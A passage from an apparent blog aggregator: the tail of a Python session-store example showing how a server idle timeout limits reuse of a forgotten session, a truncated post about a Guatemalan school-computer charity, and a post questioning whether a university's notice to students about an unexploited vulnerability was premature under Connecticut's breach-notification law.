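        # Closing a window never calls this; only an explicit logout link does.
        self._sessions.pop(sid, None)
        return "Set-Cookie: sid=; Path=/; Max-Age=0; Secure; HttpOnly; SameSite=Lax"


def walkaway_scenario(idle_timeout):
    """Constructed timeline: log in, browse 5 min, close the window (not the browser),
    walk away; 20 min later the next person reopens the browser. Returns whom the server sees."""
    clock = {"t": 0.0}                       # injectable clock for a deterministic run
    store = SessionStore(now=lambda: clock["t"], idle_timeout=idle_timeout)
    sid = store.create("student")
    clock["t"] = 5 * 60
    store.resolve(sid)                       # last legitimate request
    clock["t"] = 25 * 60
    return store.resolve(sid)                # "student" with no idle timeout, None with one
```

Clearing private data on the client, as the post recommends, and an idle timeout on the server are complementary: the first protects against the browser that was left running, the second bounds how long a forgotten session stays usable.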

Josh Zeidner

Josh Weiss: Networking The Poor in Guatemala with Partners In Solidarity

I recently had the opportunity to talk to Josh Weiss, who works with Partners in Solidarity. Partners in Solidarity was founded by Matthew Rutman with the vision of bringing computers and technical education to the rural schools and NGO's of the Guatemalan state of Quetzaltenango. The project facilitates the donation of computers, supplied by Next Step Recycling in Eugene, Oregon, to allow for

by wizkid (noreply@blogger.com) at April 24, 2008 10:42 AM

Kees Leune

Vulnerability notifications?

Interesting.

ESI is running an article about a potential information disclosure at Southern Connecticut State University.

Southern Connecticut State University has alerted current and former students after a review of a university web site discovered a vulnerability that could have allowed an unauthorized individual access to personal information. During a recent review of a web server, the university discovered that unauthorized individuals could have had access to applications for graduation dating back to 2002.
Source: ESI press release

What I find interesting in this is that the university chose to notify students, while there does not seem to be proof of a disclosure, just a vulnerability that could potentially have been abused. All affected students (past and current) are offered two years of credit watch.
Even if a vulnerability was exploited on a server that also contained that information, notification might not be required:

Connecticut breach notification law states:

Any person who conducts business in this state, and who, in the ordinary course of such person's business, owns, licenses or maintains computerized data that includes personal information, shall disclose any breach of security following the discovery of the breach to any resident of this state whose personal information was, or is reasonably believed to have been, accessed by an unauthorized person through such breach of security.
Source: CT notification law
The next question becomes: when is it reasonably believed to have been accessed? Most compromised web applications that I have seen were exploited for defacement, to host malware, or to host other illegal content. Hardly ever were they used to go after other data that is stored on them. This is especially the case for Universities, who are typically on high-bandwidth pipes.

What is the implication for other institutions if it becomes common practice to notify when a vulnerability has been identified, without there being any signs of an actual breach? While it is commendable that Southern State University is taking such a transparent and pro-active position, the decision to do so may have been taken too quickly.

It is safe to assume that at least half of all web applications that are currently in use have some form of vulnerability in them. If all organizations that deploy such applications have to start notifying their users that a program may contain vulnerabilities that could be exploited to possibly gain unauthorized access to information, we might as well pull the plug and sit in our corners until we learn to develop applications that are 100% secure. I do not see that happening any time soon.

I am a very big advocate of privacy and due care. However, I cannot help but feel that this notification is a bit premature. I would also be very interested to see if any research has been done to find out how many times people that have been put on credit watch after a breach have actually become a victim of identity theft, and of those victims, how many can actually be tied to the unintended disclosure.

Breach notification laws are a good thing, because they make us look after our data a lot better, but I cannot help but feel that we cry wolf much too often.